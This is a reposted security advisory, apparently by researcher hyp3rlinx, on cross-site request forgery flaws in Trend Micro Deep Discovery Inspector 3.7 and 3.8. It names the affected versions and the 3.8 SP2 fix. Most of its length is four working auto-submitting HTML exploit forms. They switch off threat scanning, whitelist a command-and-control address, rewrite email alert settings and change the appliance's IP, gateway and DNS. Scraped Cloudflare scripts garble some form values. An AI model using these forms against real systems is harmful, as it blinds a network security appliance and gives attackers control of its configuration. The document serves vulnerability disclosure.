Home / os / linux

Trend Micro Deep Discovery Inspector 3.7 / 3.8 CSRF

Posted on 30 November -0001

<HTML><HEAD><TITLE>Trend Micro Deep Discovery Inspector 3.7 / 3.8 CSRF</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>[+] Credits: John Page aka hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/TRENDMICRO-DDI-CSRF.txt Vendor: ==================== www.trendmicro.com Product: ========================================= Trend Micro Deep Discovery Inspector V3.8, 3.7 Deep Discovery Inspector is a network appliance that gives you 360-degree network monitoring of all traffic to detect all aspects of a targeted attack. Vulnerability Type: ================================ Cross Site Request Forgery - CSRF CVE Reference: ============== N/A Vulnerability Details: ================================ Trend Micro Deep Discovery suffers from multiple CSRF vectors, if an authenticated user visits an malicious webpage attackers will have ability to modify many settings of the Deep Discovery application to that of the attackers choosing. Reference: http://esupport.trendmicro.com/solution/en-US/1113708.aspx Trend Micro DDI is affected by CSRF vulnerabilities. These affect the following console features: Deny List Notifications Detection Rules Threat Detections Email Settings Network Blacklisting/Whitelisting Time Accounts Power Off / Restart DETAILS The following DDI versions prior to version 3.8 Service Pack 2 (SP2) are affected: 3.8 English 3.8 Japanese 3.7 English 3.7 Japanese 3.7 Simplified Chinese Trend Micro has released DDI 3.8 SP2. All versions up to version 3.8 SP1 must upgrade to version 3.8 SP2 (Build 3.82.1133) to address this issue. Exploit code(s): =============== 1) Shut down all threat scans and malicious file submissions under: Administration /Monitoring / Scanning / Threat Detections <iframe id="demonica" name="demonica"></iframe> <form id="CSRF-ThreatScans" target="demonica" action=" https://localhost/php/scan_options.php" method="post"> <input type="hidden" name="act" value="set" /> <input type="hidden" name="enable_all" value="0" /> <input type="hidden" name="enable_vsapi" value="1" /> <input type="hidden" name="enable_marsd" value="1" /> <input type="hidden" name="enable_ops" value="1" /> <input type="hidden" name="enable_block" value="0" /> <input type="hidden" name="enable_feedback" value="0" /> <input type="hidden" name="enable_send_suspicious_file" value="0" /> <script>document.getElementById('CSRF-ThreatScans').submit()</script> </form> 2) Whitelist C&C server menu location: Detections / C&C Callback Addresses <form id="CSRF-Whitelist" target="demonica" action=" https://localhost/php/blacklist_whitelist_query.php" method="post"> <input type="hidden" name="black_or_white" value="ccca" /> <input type="hidden" name="action" value="move_to_white_ccca" /> <input type="hidden" name="delete_list" value='"list":[{"name":" http://bad.place.com/","list_type":"3"}]}"' /> <input type="hidden" name="comments" value="TEST" /> <script>document.getElementById('CSRF-Whitelist').submit()</script> </form> 3) Turn off or change email notifications <form id="CSRF-Notifications" target="demonica" action=" https://localhost/cgi-bin/mailSettings_set.cgi" method="post"> <input type="hidden" name="adm_email_address" value="<a class="__cf_email__" href="/cdn-cgi/l/email-protection" data-cfemail="c6b6b3a8adb5a8a9b2a2a3a7a286aea3aaaae8a5a9ab">[email protected]</a><script data-cfhash='f9e31' type="text/javascript">/* <![CDATA[ */!function(t,e,r,n,c,a,p){try{t=document.currentScript||function(){for(t=document.getElementsByTagName('script'),e=t.length;e--;)if(t[e].getAttribute('data-cfhash'))return t[e]}();if(t&&(c=t.previousSibling)){p=t.parentNode;if(a=c.getAttribute('data-cfemail')){for(e='',r='0x'+a.substr(0,2)|0,n=2;a.length-n;n+=2)e+='%'+('0'+('0x'+a.substr(n,2)^r).toString(16)).slice(-2);p.replaceChild(document.createTextNode(decodeURIComponent(e)),c)}p.removeChild(t)}}catch(u){}}()/* ]]> */</script>" /> <input type="hidden" name="sender_address" value="<a class="__cf_email__" href="/cdn-cgi/l/email-protection" data-cfemail="7101041f1a021f1e05151410153119141d1d5f121e1c">[email protected]</a><script data-cfhash='f9e31' type="text/javascript">/* <![CDATA[ */!function(t,e,r,n,c,a,p){try{t=document.currentScript||function(){for(t=document.getElementsByTagName('script'),e=t.length;e--;)if(t[e].getAttribute('data-cfhash'))return t[e]}();if(t&&(c=t.previousSibling)){p=t.parentNode;if(a=c.getAttribute('data-cfemail')){for(e='',r='0x'+a.substr(0,2)|0,n=2;a.length-n;n+=2)e+='%'+('0'+('0x'+a.substr(n,2)^r).toString(16)).slice(-2);p.replaceChild(document.createTextNode(decodeURIComponent(e)),c)}p.removeChild(t)}}catch(u){}}()/* ]]> */</script>" /> <input type="hidden" name="mail_server" value="x.x.x.x" /> <input type="hidden" name="mail_server_port" value="25" /> <input type="hidden" name="showusername" value="" /> <input type="hidden" name="showpassword" value="" /> <input type="hidden" name="max_notification_per_hour" value="5" /> <input type="hidden" name="check_mail_queue" value="60" /> <input type="hidden" name="server" value="x.x.x.x" /> <input type="hidden" name="port" value="25" /> <input type="hidden" name="admin_address" value="" /> <input type="hidden" name="from_address" value="<a class="__cf_email__" href="/cdn-cgi/l/email-protection" data-cfemail="8ddddac3c8c9cddddac3c8c9a3eee2e0">[email protected]</a><script data-cfhash='f9e31' type="text/javascript">/* <![CDATA[ */!function(t,e,r,n,c,a,p){try{t=document.currentScript||function(){for(t=document.getElementsByTagName('script'),e=t.length;e--;)if(t[e].getAttribute('data-cfhash'))return t[e]}();if(t&&(c=t.previousSibling)){p=t.parentNode;if(a=c.getAttribute('data-cfemail')){for(e='',r='0x'+a.substr(0,2)|0,n=2;a.length-n;n+=2)e+='%'+('0'+('0x'+a.substr(n,2)^r).toString(16)).slice(-2);p.replaceChild(document.createTextNode(decodeURIComponent(e)),c)}p.removeChild(t)}}catch(u){}}()/* ]]> */</script>" /> <input type="hidden" name="username" value="" /> <input type="hidden" name="password" value="" /> <input type="hidden" name="freq_limit_interval" value="3600" /> <input type="hidden" name="freq_limit_softlimit" value="5" /> <input type="hidden" name="testconnect" value="config" /> <input type="hidden" name="which_cgi_flag" value="" /> <input type="hidden" name="alert_message" value="" /> <input type="hidden" name="save_status" value="false" /> <script>document.getElementById('CSRF-Notifications').submit()</script> </form> 4) Change system settings ( x.x.x.x = whatever IP we want ) <form id='PWNED' target="demonica" action=" https://localhost/cgi-bin/admin_ip.cgi" method="post"> <input type="hidden" name="txtHostname" value="localhost" /> <input type="hidden" name="radioType" value="radiobutton" /> <input type="hidden" name="txtIP" value="x.x.x.x" /> <input type="hidden" name="txtNetmask" value="255.255.0.0" /> <input type="hidden" name="txtGateway" value="x.x.x.x" /> <input type="hidden" name="txtDNS1" value="x.x.x.x" /> <input type="hidden" name="txtDNS2" value="x.x.x.x" /> <input type="hidden" name="txtIP_ip6" value="" /> <input type="hidden" name="txtIP_ip6_prefix" value="" /> <input type="hidden" name="txtGateway_ip6" value="" /> <input type="hidden" name="txtDNS1_ip6" value="" /> <input type="hidden" name="td_start" value="Start" /> <input type="hidden" name="td_start" value="Start" /> <input type="hidden" name="td_analyze" value="View" /> <input type="hidden" name="td_export" value="Export" /> <input type="hidden" name="td_reset" value="Reset" /> <input type="hidden" name="button1112" value="Cancel" /> <input type="hidden" name="network_type" value="static" /> <input type="hidden" name="act" value="save" /> <input type="hidden" name="Hostname" value="localhost" /> <input type="hidden" name="IP" value="x.x.x.x" /> <input type="hidden" name="Netmask" value="255.255.0.0" /> <input type="hidden" name="Gateway" value="x.x.x.x" /> <input type="hidden" name="DNS1" value="x.x.x.x" /> <input type="hidden" name="DNS2" value="x.x.x.x" /> <input type="hidden" name="enable_ip6" value="no" /> <input type="hidden" name="network_type_ip6" value="static" /> <input type="hidden" name="IP_ip6" value="" /> <input type="hidden" name="IP_ip6_prefix" value="" /> <input type="hidden" name="Gateway_ip6" value="" /> <input type="hidden" name="DNS1_ip6" value="" /> <input type="hidden" name="port1_nic" value="eth0" /> <input type="hidden" name="port1_type" value="auto" /> <input type="hidden" name="port1_speed" value="" /> <input type="hidden" name="port1_duplex" value="" /> <input type="hidden" name="port1_attr" value="MGMT" /> <input type="hidden" name="port1_cap" value="auto%3A10H%3A10F%3A100H%3A100F%3A1000F" /> <input type="hidden" name="port1_state" value="1000" /> <input type="hidden" name="port2_nic" value="eth1" /> <input type="hidden" name="port2_type" value="auto" /> <input type="hidden" name="port2_speed" value="" /> <input type="hidden" name="port2_duplex" value="" /> <input type="hidden" name="port2_attr" value="INT" /> <input type="hidden" name="port2_cap" value="auto%3A10H%3A10F%3A100H%3A100F%3A1000F" /> <input type="hidden" name="port2_state" value="1000" /> <input type="hidden" name="port3_nic" value="eth2" /> <input type="hidden" name="port3_type" value="auto" /> <input type="hidden" name="port3_speed" value="" /> <input type="hidden" name="port3_duplex" value="" /> <input type="hidden" name="port3_attr" value="INT" /> <input type="hidden" name="port3_cap" value="auto%3A10H%3A10F%3A100H%3A100F%3A1000F" /> <input type="hidden" name="port3_state" value="1000" /> <input type="hidden" name="port4_nic" value="eth3" /> <input type="hidden" name="port4_type" value="auto" /> <input type="hidden" name="port4_speed" value="" /> <input type="hidden" name="port4_duplex" value="" /> <input type="hidden" name="port4_attr" value="INT" /> <input type="hidden" name="port4_cap" value="auto%3A10H%3A10F%3A100H%3A100F%3A1000F" /> <input type="hidden" name="port4_state" value="-1" /> <input type="hidden" name="port5_nic" value="eth4" /> <input type="hidden" name="port5_type" value="auto" /> <input type="hidden" name="port5_speed" value="" /> <input type="hidden" name="port5_duplex" value="" /> <input type="hidden" name="port5_attr" value="INT" /> <input type="hidden" name="port5_cap" value="auto%3A10H%3A10F%3A100H%3A100F%3A1000F" /> <input type="hidden" name="port5_state" value="-1" /> <input type="hidden" name="port6_nic" value="eth5" /> <input type="hidden" name="port6_type" value="auto" /> <input type="hidden" name="port6_speed" value="" /> <input type="hidden" name="port6_duplex" value="" /> <input type="hidden" name="port6_attr" value="INT" /> <input type="hidden" name="port6_cap" value="auto%3A10H%3A10F%3A100H%3A100F%3A1000F" /> <input type="hidden" name="port6_state" value="-1" /> <input type="hidden" name="port7_nic" value="eth6" /> <input type="hidden" name="port7_type" value="manual" /> <input type="hidden" name="port7_speed" value="10000" /> <input type="hidden" name="port7_duplex" value="full" /> <input type="hidden" name="port7_attr" value="INT" /> <input type="hidden" name="port7_cap" value="10000F" /> <input type="hidden" name="port7_state" value="-1" /> <input type="hidden" name="port8_nic" value="eth7" /> <input type="hidden" name="port8_type" value="manual" /> <input type="hidden" name="port8_speed" value="10000" /> <input type="hidden" name="port8_duplex" value="full" /> <input type="hidden" name="port8_attr" value="INT" /> <input type="hidden" name="port8_cap" value="10000F" /> <input type="hidden" name="port8_state" value="-1" /> <input type="hidden" name="port9_nic" value="ext3" /> <input type="hidden" name="port9_type" value="auto" /> <input type="hidden" name="port9_speed" value="" /> <input type="hidden" name="port9_duplex" value="" /> <input type="hidden" name="port9_attr" value="N%2FA" /> <input type="hidden" name="port9_cap" value="" /> <input type="hidden" name="port9_state" value="" /> <input type="hidden" name="port10_nic" value="ext4" /> <input type="hidden" name="port10_type" value="auto" /> <input type="hidden" name="port10_speed" value="" /> <input type="hidden" name="port10_duplex" value="" /> <input type="hidden" name="port10_attr" value="N%2FA" /> <input type="hidden" name="port10_cap" value="" /> <input type="hidden" name="port10_state" value="" /> <input type="hidden" name="port11_nic" value="ext5" /> <input type="hidden" name="port11_type" value="auto" /> <input type="hidden" name="port11_speed" value="" /> <input type="hidden" name="port11_duplex" value="" /> <input type="hidden" name="port11_attr" value="N%2FA" /> <input type="hidden" name="port11_cap" value="" /> <input type="hidden" name="port11_state" value="" /> <input type="hidden" name="port12_nic" value="ext6" /> <input type="hidden" name="port12_type" value="auto" /> <input type="hidden" name="port12_speed" value="" /> <input type="hidden" name="port12_duplex" value="" /> <input type="hidden" name="port12_attr" value="N%2FA" /> <input type="hidden" name="port12_cap" value="" /> <input type="hidden" name="port12_state" value="" /> <input type="hidden" name="port13_nic" value="ext7" /> <input type="hidden" name="port13_type" value="auto" /> <input type="hidden" name="port13_speed" value="" /> <input type="hidden" name="port13_duplex" value="" /> <input type="hidden" name="port13_attr" value="N%2FA" /> <input type="hidden" name="port13_cap" value="" /> <input type="hidden" name="port13_state" value="" /> <input type="hidden" name="port14_nic" value="ext8" /> <input type="hidden" name="port14_type" value="auto" /> <input type="hidden" name="port14_speed" value="" /> <input type="hidden" name="port14_duplex" value="" /> <input type="hidden" name="port14_attr" value="N%2FA" /> <input type="hidden" name="port14_cap" value="" /> <input type="hidden" name="port14_state" value="" /> <input type="hidden" name="port15_nic" value="ext9" /> <input type="hidden" name="port15_type" value="auto" /> <input type="hidden" name="port15_speed" value="" /> <input type="hidden" name="port15_duplex" value="" /> <input type="hidden" name="port15_attr" value="N%2FA" /> <input type="hidden" name="port15_cap" value="" /> <input type="hidden" name="port15_state" value="" /> <input type="hidden" name="port16_nic" value="ext10" /> <input type="hidden" name="port16_type" value="auto" /> <input type="hidden" name="port16_speed" value="" /> <input type="hidden" name="port16_duplex" value="" /> <input type="hidden" name="port16_attr" value="N%2FA" /> <input type="hidden" name="port16_cap" value="" /> <input type="hidden" name="port16_state" value="" /> <input type="hidden" name="port17_nic" value="ext11" /> <input type="hidden" name="port17_type" value="auto" /> <input type="hidden" name="port17_speed" value="" /> <input type="hidden" name="port17_duplex" value="" /> <input type="hidden" name="port17_attr" value="N%2FA" /> <input type="hidden" name="port17_cap" value="" /> <input type="hidden" name="port17_state" value="" /> <input type="hidden" name="port18_nic" value="ext12" /> <input type="hidden" name="port18_type" value="auto" /> <input type="hidden" name="port18_speed" value="" /> <input type="hidden" name="port18_duplex" value="" /> <input type="hidden" name="port18_attr" value="N%2FA" /> <input type="hidden" name="port18_cap" value="" /> <input type="hidden" name="port18_state" value="" /> <input type="hidden" name="port19_nic" value="ext13" /> <input type="hidden" name="port19_type" value="auto" /> <input type="hidden" name="port19_speed" value="" /> <input type="hidden" name="port19_duplex" value="" /> <input type="hidden" name="port19_attr" value="N%2FA" /> <input type="hidden" name="port19_cap" value="" /> <input type="hidden" name="port19_state" value="" /> <input type="hidden" name="port20_nic" value="ext14" /> <input type="hidden" name="port20_type" value="auto" /> <input type="hidden" name="port20_speed" value="" /> <input type="hidden" name="port20_duplex" value="" /> <input type="hidden" name="port20_attr" value="N%2FA" /> <input type="hidden" name="port20_cap" value="" /> <input type="hidden" name="port20_state" value="" /> <input type="hidden" name="tcpdump" value="" /> <input type="hidden" name="interface" value="" /> <input type="hidden" name="vlan_enable" value="0" /> <script>document.getElementById('PWNED').submit()</script> </form> Disclosure Timeline: ======================================= Vendor Notification: November 23, 2015 March 25, 2016 : Public Disclosure Exploitation Technique: ======================= Remote Severity Level: ================ High Description: ======================================================================== Request Method(s): [+] POST Vulnerable Product: [+] Trend Micro Deep Discovery Inspector V3.8 ======================================================================== [+] Disclaimer Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. by hyp3rlinx </BODY></HTML>

 

TOP

Malware :